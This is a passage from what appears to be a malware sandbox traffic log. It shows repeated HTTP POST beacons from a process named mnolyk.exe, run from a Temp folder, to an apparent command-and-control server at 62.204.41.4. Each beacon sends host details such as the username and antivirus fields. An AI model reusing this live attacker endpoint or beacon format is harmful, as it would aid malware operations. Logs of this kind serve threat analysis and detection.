                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:29.900589943 CET361INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:29 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        16192.168.2.54970662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:32.563263893 CET216OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:32.627523899 CET217INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:32 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        160192.168.2.54985062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:30.084700108 CET361OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:30.150609970 CET362INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:30 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        161192.168.2.54985162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:30.340440035 CET362OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:30.406188965 CET363INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:30 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        162192.168.2.54985262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:30.586453915 CET363OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:30.649900913 CET364INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:30 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        163192.168.2.54985362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:30.867273092 CET364OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:30.931150913 CET365INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:30 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        164192.168.2.54985462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:31.105330944 CET365OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:31.170226097 CET366INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:31 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        165192.168.2.54985562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:31.349236965 CET366OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:31.414278984 CET367INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:31 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        166192.168.2.54985662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:31.586278915 CET367OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:31.649513006 CET368INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:31 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        167192.168.2.54985762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:31.816085100 CET368OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:31.880172968 CET369INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:31 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        168192.168.2.54985862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:32.692574978 CET369OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:32.758615971 CET370INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:32 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        169192.168.2.54985962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:33.007738113 CET370OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:33.074064016 CET371INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:33 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        17192.168.2.54970762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:32.799134016 CET217OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:32.866416931 CET218INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:32 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        170192.168.2.54986062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:33.773507118 CET371OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:33.837563038 CET372INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:33 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        171192.168.2.54986162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:34.059958935 CET372OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:34.124953985 CET373INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:34 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        172192.168.2.54986262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:34.385168076 CET373OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:34.449311972 CET374INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:34 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        173192.168.2.54986362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:35.672249079 CET374OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:35.737863064 CET375INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:35 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        174192.168.2.54986462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:35.997425079 CET375OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:36.062361956 CET376INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:36 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        175192.168.2.54986562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:36.266769886 CET376OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:36.329330921 CET377INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:36 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        176192.168.2.54986662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:36.501144886 CET377OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:36.565888882 CET378INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:36 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        177192.168.2.54986762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:36.742778063 CET378OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
